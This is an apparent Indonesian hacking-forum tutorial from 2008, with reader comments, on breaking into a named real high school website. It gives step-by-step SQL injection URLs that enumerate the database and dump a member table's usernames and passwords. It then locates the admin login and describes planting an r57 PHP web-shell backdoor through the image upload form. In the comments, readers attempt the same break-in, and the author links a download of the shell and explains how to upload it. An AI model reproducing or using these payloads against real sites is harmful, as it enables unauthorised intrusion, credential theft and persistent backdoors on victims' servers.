By D4rXz[at]zonehacking.com
Published: October 17, 2008
Updated: October 18, 2008
Print
Email
----------------------------------------------------------------- |Tittle : Berawal SQL Blind Berakhir r57 | |Level : Beginner | |Author : D4rXz[at]zonehacking.com | |Note : Tutorial ini hanya untuk pembelajaran, semoga pembaca | | dapat bersikap bijaksana dan diluar semua itu penulis | | tidak bertanggung jawab atas aksi dari content ini | | oleh pihak ke dua atau tiga dst. | ----------------------------------------------------------------- 1) Bagaimana mengetahui site tersebut mengandung vuln SQL Injection ? Biasanya
menggunakan petik tunggal (') atau menggunakan operator (and 1=2) untuk
mendapatkan error yang mengindikasikan respon dari mysql server.
example respon server mysql :
http://sma74jkt.sch.id/berita/media_detail.php?recordID=240' 
2) Memeriksa Kolom Bagian
ini adalah pemeriksaan jumlah kolom sampai dimana kondisi adalah false.
Dalam kasus ini si penulis menggunakan 'order by'. Cara melakukan
pengecheckan dimulai dari 1 s/d kondisi halaman mendapatkan kondisi
false. Dalam kasus ini kondisi false adalah 20 jadi kolom yang tersedia
adalah sampai dengan 19.
example kondisi false check kolom : kolomhttp://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19'

note
: Melakukan "order by" bisa dengan cara satu-persatu sampai false.
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+19' http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+20' [kondisi false] jadi tanpa harus dituliskan semua kolum.
3) Mencari Hole Kolom Untuk
mencari Hole Kolom ini tidak sulit jika kita sudah menentukan jumlah
kolom yang tersedia. Dalam kasus ini menggunakan “union selectâ€.
Dan terlihat pada gambar hole kolom terdapat pada kolom 12. Yang
nantinya segala informasi database akan dikeluarkan melaluli hole kolom
tsb.
example penunjukan hole kolom : http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19' 
4) Melihat informasi versi MySQL Mengapa kita perlu mengetahui info ini? Karena setiap metode hack pada MySQL versi 4 dan versi 5 berbeda [simple]. Dalam kasus ini penulis menggunakan version().
example info versi MySQL : http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19'
5) Memeriksa Tabel Untuk memeriksa tabel kita menggunakan 3 perintah dalam kasus ini. Perintah yang digunakan adalah 'information.schema.tables'; 'table_name' dan 'limit [tanpa tanda petik dua].
example melihat table : http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables'
example mencari table [limit]: http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables+limit+17,1'
 note
: temukan table yang menarik [user,anggota,admin] dengan merubah 1 s/d
mendapatkan table yang menarik, dalam kasus ini di temukan tabel yang
menarik pada 'limit 17,18' yaitu table anggota.
tips cara cepat [advanced] http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_schema=database()' 
6) Melihat isi colum dari tabel Ini
adalah bagian langkah cara untuk mengetahui kolum-kolum pada tabel yang
bersangkutan, si penulis menggunakan cara cepat dengan perintah
'group_concat(column_name)'.
example : http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0×616e67676f7461'

7) Melihat data dari kolom-kolom tersebut Ini adalah step terahkir. Dan peranan perintah 'group_concat†sangat membantu dalam hal efisiensi waktu.
example hasil penelusuran SQL Injection : http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(no_anggota,0×3a,nama,0×3a,nama_lengkap,0×3a,password,0×3a,status,0×3a,level),13,14,15,16,17,18,19+from+anggota'
note : 0×3a adalah bentuk hex dari ASCII ':' [tanpa tanda petik dua] si penulis sengaja menggunakan ini agar terlihat rapi. atau pakai yang ini 0×7c7c untuk menghasilkan '||' [tanpa tanda petik].
—————–---------------------[ THE END SQL INJECTION ]---------------------————————
Mencari halaman login Dalam
kasus ini si penulis hanya mengunakan teknik insting/naluri/tebak2an.
Namun ada cara yang lebih rasional dalam mencari halaman login admin
dengan menggunakan tool scanner. Dalam kasus ini site tersebut halaman
login berada pada: http://sma74jkt.sch.id/login.php

9) Menanam BackDoor r57 pada fasilitas upload gambar.



note : kita manfaatkan fasilitas tranfersal directory [masih ingat pada mission 4 [at] boleh-hacking.com ]
----------------------------[ The End Install BackDoor r57 ]-----------------------
Akhirkata aku mengucapkan terima kasih sebesarnya2 kepada :
- Adhietslank [om ini ngajarin tentang aplikasi exploit (bot, proxy, psyBNC)] - home_edition2001/2007 [om yang satu ini ngajarin carding lewat r57] - ich_fti [om ini ngajarin aku SQL Injection] - fl3xu5 [om ini mw berbagi wawasan hacking wirelless] - jack[at]zonehacking [thank's yah kerpercayaan moderatornya] - GheMaX[at]zonehacking [thank's yah kepercayaan kerja samanya] - Ali3n[at]zonehacking [thank's yah tutor metasploit] - dll yang tak bisa aku sebutkan satu-persatu karena keterbatasan tempat.
----------------------------[ The End ]------------------------------
View Comments (15)
|
0×616e67676f7461 <-ne gmn maksutnya KK
mohon pencerahannya !!!!!!!!plissss
itu adalah hasil converter ASCII ke HEX...
dalam kasus ini yg di Konvert adalah nama tabel yg bersangkutan, yang ingin dilihat informasinya..
semoga paham..
tu gmn ya kk??apa pake semacam software gt???ato gmn ya???
maaf sebelumnya lok terlalu banyak tanya.....
pake website juga bisa..
contohnya site ini :
http://centricle.com/tools/ascii-hex/
gpp banyak bertanya, soalnya dulu saya juga seperti anda..jd saya mengerti..
ebad..mustinya judul diganti jadi "from hacker to high school webadmin"
K E W L
saya mo tanya lg kk,jd ga enak ne
saya kan udah msk login trs http://sma74jkt.sch.id/berita/input_gambar_baru.php
yg saya bngung gmn ya cara msk k shellx?
trima kasih sblumnya
itu upload dulu om..r57/c99 nya..
anda bisa mengunduhnya di http://geocities.com/d4rxz/r57.txt lalu rename menjadi r57.php setelah itu upload.. tp sbelumnya anda diminta buat direktori dulu..pada fiture site tsb..
@keplitek
saya masih cupu om..karena saya masih di barisan2 lamer/script kiddies...yg perlu banyak belajar etika hacker..
oke boz
trima kasih banyak!!!!!!!!
ntar ane tanya lagi leh kan boz...
boz tu scriptx d cp d notpadkan boz???
tp uploadnyakok g bisa yah???
maklum boz msh cupu???
yups di copas.
sharusnya bisa..ato mungkin ada yg ngepatch..tp ngk mungkin masa vuln sql injectnya ngk d patch skalian..
Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move '/tmp/phpKLWUxN' to 'r57.php.php' in /home/sma74jkt/public_html/berita/input_gambar.php on line 328
kluar kyk gini boz????????
bikin directorynya dimana?
ya sesuai dg petunjuk boz...
yang ../conf itu..
gmn boz?????
mantapssssssss